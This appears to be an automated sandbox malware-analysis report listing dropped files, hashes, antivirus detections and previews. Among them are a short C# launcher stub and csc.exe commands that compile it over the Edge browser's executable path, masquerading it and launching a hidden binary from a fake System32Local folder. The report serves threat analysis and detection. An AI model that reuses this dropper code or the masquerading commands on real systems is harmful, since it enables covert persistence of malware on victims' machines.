Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xobedcjp.xp0.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\w5cymjn5\w5cymjn5.0.cs

Download File

Process:	C:\portBrokerDll\DriverbrokerCrtDhcp.exe
File Type:	C++ source, Unicode text, UTF-8 (with BOM) text
Category:	dropped
Size (bytes):	406
Entropy (8bit):	5.092799467319604
Encrypted:	false
SSDEEP:	12:V/DNVgtDIbSf+eBL6LzIfiFkMSf+eBLmniFkD:JNVQIbSfhWLzIiFkMSfhCiFkD
MD5:	841ADDE31066BBE7C24B4AC14527A892
SHA1:	2E5CE09B4688F9E96C87F0476454B80FE224CA04
SHA-256:	3DA59DB4039BF2F56BA24756BB33BB6F543DEA515A02771DCD6F26A33D090044
SHA-512:	9D5A6BFDBD53D7A4D5F4A2BF00607D7D93EE351F4C9354C4A309A2B65CE8B8675E475E13F9E591793254A344E808B2594B48486F2A10BA7B1BFBC06967C6860C
Malicious:	false
Preview:	.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe"); } catch { } }).Start();. }.}.

C:\Users\user\AppData\Local\Temp\w5cymjn5\w5cymjn5.cmdline

Download File

Process:	C:\portBrokerDll\DriverbrokerCrtDhcp.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:	dropped
Size (bytes):	268
Entropy (8bit):	5.1369545553040465
Encrypted:	false
SSDEEP:	6:Hu+H2L//1xRf5oeTckKBzxsjGZxWE8oN723fPLIo8eyWH:Hu7L//TRRzscQnacovFH
MD5:	34880B32D3E02E3228098185FB4460CE
SHA1:	61A6B42A70A291206BD7F342A2615E0D0626E55B
SHA-256:	5514ED6168850E1193B842E8494609A8E973909DFFA9C61C59DD3607DDEEDD00
SHA-512:	2E6D1D257D9B3601FE0758A3C70E336831D2E880A9BC25E9A04E1860A486F38D438AA1591C46C26E29F28E0C3C9EE2E4BE51F64668B32DF8DC18E0BFBC1D0F18
Malicious:	true
Preview:	./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\w5cymjn5\w5cymjn5.0.cs"

C:\Users\user\AppData\Local\Temp\w5cymjn5\w5cymjn5.out

Download File

Process:	C:\portBrokerDll\DriverbrokerCrtDhcp.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (341), with CRLF, CR line terminators
Category:	modified
Size (bytes):	762
Entropy (8bit):	5.25802356006249
Encrypted:	false
SSDEEP:	12:Z2MI/u7L//TRRzscQnacovFOKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:0MI/un/VRzstnacovFOKax5DqBVKVrdV
MD5:	E253024E0DFF373B408319BDFC057181
SHA1:	134EFB9B3116F22CC9BD472CB7A74C1F2BDD0601
SHA-256:	AF186B1A849D300AC5191250E78873F6C59F3089A4D38FBC38AC56B92DEE8013
SHA-512:	84933B43916A24EEEE9FDD97527DDF45865AFBCADB78022475B1FAA09ACADB469FDED0486EB76879FD4BD153BA7AFB1C6C9C7113E749DF574E97BCE1D6AD8D94
Malicious:	false
Preview:	.C:\portBrokerDll> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\w5cymjn5\w5cymjn5.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\xze5z45r\xze5z45r.0.cs

Download File

Process:	C:\portBrokerDll\DriverbrokerCrtDhcp.exe
File Type:	C++ source, Unicode text, UTF-8 (with BOM) text
Category:	dropped
Size (bytes):	399
Entropy (8bit):	5.075862295218959
Encrypted:	false
SSDEEP:	12:V/DNVgtDIbSf+eBLGanUIfiFkMSf+eBLmniFkD:JNVQIbSfhSanUIiFkMSfhCiFkD
MD5:	D7B0D9759A51EBC2961853976335D5EC
SHA1:	F1C37A361D0C462132602F2E5D89035FEF51A7A3
SHA-256:	DAE5F76D2E7AF0CC1B6CC127967BA6DD9BE98B8385119ADD7963BB5995FEF946
SHA-512:	2EDEDE31EA06DBA4E444BDD6893DB9D8364DA96DAF82E0882F948327DE80C4805E23F556CE7692CBE555C29B38EE27E9F65698D3FD99F933087C69891304EC70
Malicious:	false
Preview:	.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe"); } catch { } }).Start();. }.}.

C:\Users\user\AppData\Local\Temp\xze5z45r\xze5z45r.cmdline

Download File

Process:	C:\portBrokerDll\DriverbrokerCrtDhcp.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:	dropped
Size (bytes):	261
Entropy (8bit):	5.061815249345358
Encrypted:	false
SSDEEP:	6:Hu+H2L//1xRPN723fyJUYwBzxsjGZxWE8oN723fnRgIbn:Hu7L//TRVanYwcQnaXb
MD5:	13E45495BC3228975684932A3F62A3A7
SHA1:	C998FBCA46DA7703A3A5F16D850B3AFD8C3776A1
SHA-256:	A8B66360A32AB1310BBA1080E54C63BE76E73C45E0F93A35405CAB2BF9F27808
SHA-512:	6B72EBBA92EC92F8324C641486FD24D24A2F0C9D7A31F412801A4C78B02D64A0DE84DCB3B6D7D9EA32D6858AFC7ECB6EED2EC4776A58F25D0A631C6B3D0B5921
Malicious:	false
Preview:	./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\xze5z45r\xze5z45r.0.cs"

C:\Users\user\AppData\Local\Temp\xze5z45r\xze5z45r.out

Download File

Process:	C:\portBrokerDll\DriverbrokerCrtDhcp.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (334), with CRLF, CR line terminators
Category:	modified
Size (bytes):	755
Entropy (8bit):	5.2554229357680535
Encrypted:	false
SSDEEP:	12:Z2MI/u7L//TRVanYwcQnaXaKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:0MI/un/VVanXtnaXaKax5DqBVKVrdFAw
MD5:	68FD50F0411ABB92EB3F01B8A5155E66
SHA1:	2660C2B2B6A238E7A43F9142E7B93A220C94FC66
SHA-256:	6A7A75A73E613264EE2F7C0BFFF8EEC2EBC34E4DE7836ABFC8844BC6A1251AA5
SHA-512:	9FF5BFE60E4AEECBD1489DA4F4C68261972FAE6C0C7E91B6ED204203EFB9EB3A004243DB7BE41D3923C799B6F80AA764C83249C3DAD6E833563D021C6827551D
Malicious:	false
Preview:	.C:\portBrokerDll> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\xze5z45r\xze5z45r.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\Desktop\ARRIhAyp.log

Download File

Process:	C:\portBrokerDll\DriverbrokerCrtDhcp.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.629584586954759
Encrypted:	false
SSDEEP:	768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
MD5:	D478E398EFCD2BD9BDBFEA958F7BEE4F
SHA1:	24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
SHA-256:	32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
SHA-512:	0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 17%
Joe Sandbox View:	Filename: DCobxod.exe, Detection: malicious, Browse Filename: SearchIndexer.exe, Detection: malicious, Browse Filename: 85D5ktqjpd.exe, Detection: malicious, Browse Filename: 3XtEci4Mmo.exe, Detection: malicious, Browse Filename: aW6kSsgdvv.exe, Detection: malicious, Browse Filename: HMhdtzxEHf.exe, Detection: malicious, Browse Filename: kJrNOFEGbQ.exe, Detection: malicious, Browse Filename: lEwK4xROgV.exe, Detection: malicious, Browse Filename: zZ1Y43bxxV.exe, Detection: malicious, Browse Filename: VqGD18ELBM.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\Aqnqislq.log

Download File

Process:	C:\portBrokerDll\DriverbrokerCrtDhcp.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\BFVQSOun.log

Download File

Process:	C:\portBrokerDll\DriverbrokerCrtDhcp.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	342528
Entropy (8bit):	6.170134230759619
Encrypted:	false
SSDEEP:	3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
MD5:	9DADB5C8A6FD5020275C31EE6BC61D63
SHA1:	ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
SHA-256:	80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
SHA-512:	EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\BOtQCANk.log

Download File

Process:	C:\portBrokerDll\DriverbrokerCrtDhcp.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	70144
Entropy (8bit):	5.909536568846014
Encrypted:	false
SSDEEP:	1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
MD5:	E4FA63649F1DBD23DE91861BB39C317D
SHA1:	25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
SHA-256:	CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
SHA-512:	C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\BcHAIFcQ.log

Download File

Process:	C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33280
Entropy (8bit):	5.634433516692816
Encrypted:	false
SSDEEP:	384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
MD5:	0D323E1CACEA89CAA5DDEAF2F37BCA69
SHA1:	4769C3E947D02A1FD548BE64013F520D571D96E1
SHA-256:	873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
SHA-512:	73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................\|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\ESyrPCdJ.log

Download File

Process:	C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	342528
Entropy (8bit):	6.170134230759619
Encrypted:	false
SSDEEP:	3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
MD5:	9DADB5C8A6FD5020275C31EE6BC61D63
SHA1:	ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
SHA-256:	80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
SHA-512:	EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\FSpHSmDL.log

Download File

Process:	C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38912
Entropy (8bit):	5.679286635687991
Encrypted:	false
SSDEEP:	768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
MD5:	9E910782CA3E88B3F87826609A21A54E
SHA1:	8DBC333244620EDA5D3F1C9EAA6B924455262303
SHA-256:	3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
SHA-512:	592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\GGCzAPYH.log

Download File

Process:	C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	36352
Entropy (8bit):	5.668291349855899
Encrypted:	false
SSDEEP:	384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
MD5:	94DA5073CCC14DCF4766DF6781485937
SHA1:	57300CA6033974810B71CF1AB4F047A026924A7A
SHA-256:	B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
SHA-512:	7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\GpvhmufF.log

Download File

Process:	C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34304
Entropy (8bit):	5.618776214605176
Encrypted:	false
SSDEEP:	768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
MD5:	9B25959D6CD6097C0EF36D2496876249
SHA1:	535B4D0576746D88537D4E9B01353210D893F4D2
SHA-256:	4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
SHA-512:	C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 9%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t\|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\GyShWgyC.log

Download File

Process:	C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	41472
Entropy (8bit):	5.6808219961645605
Encrypted:	false
SSDEEP:	768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
MD5:	6CD78D07F9BD4FECC55CDB392BC5EC89
SHA1:	094DE32070BED60A811D983740509054AD017CE4
SHA-256:	16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
SHA-512:	5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\IlCyhHua.log

Download File

Process:	C:\portBrokerDll\DriverbrokerCrtDhcp.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	50176
Entropy (8bit):	5.723168999026349
Encrypted:	false
SSDEEP:	768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
MD5:	2E116FC64103D0F0CF47890FD571561E
SHA1:	3EF08A9B057D1876C24FC76E937CDA461FAC6071
SHA-256:	25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
SHA-512:	39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\ItmQLqVf.log

Download File

Process:	C:\portBrokerDll\DriverbrokerCrtDhcp.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\KZGGSUqY.log

Download File

Process:	C:\portBrokerDll\DriverbrokerCrtDhcp.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\LuUydMov.log

Download File

Process:	C:\Windows\System32Local\NZdXlPbVdUubKXQ.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	46592
Entropy (8bit):	5.870612048031897
Encrypted:	false
SSDEEP:	768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
MD5:	3601048DFB8C4A69313A593E74E5A2DE
SHA1:	A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
SHA-256:	F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
SHA-512:	B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
Malicious:	true
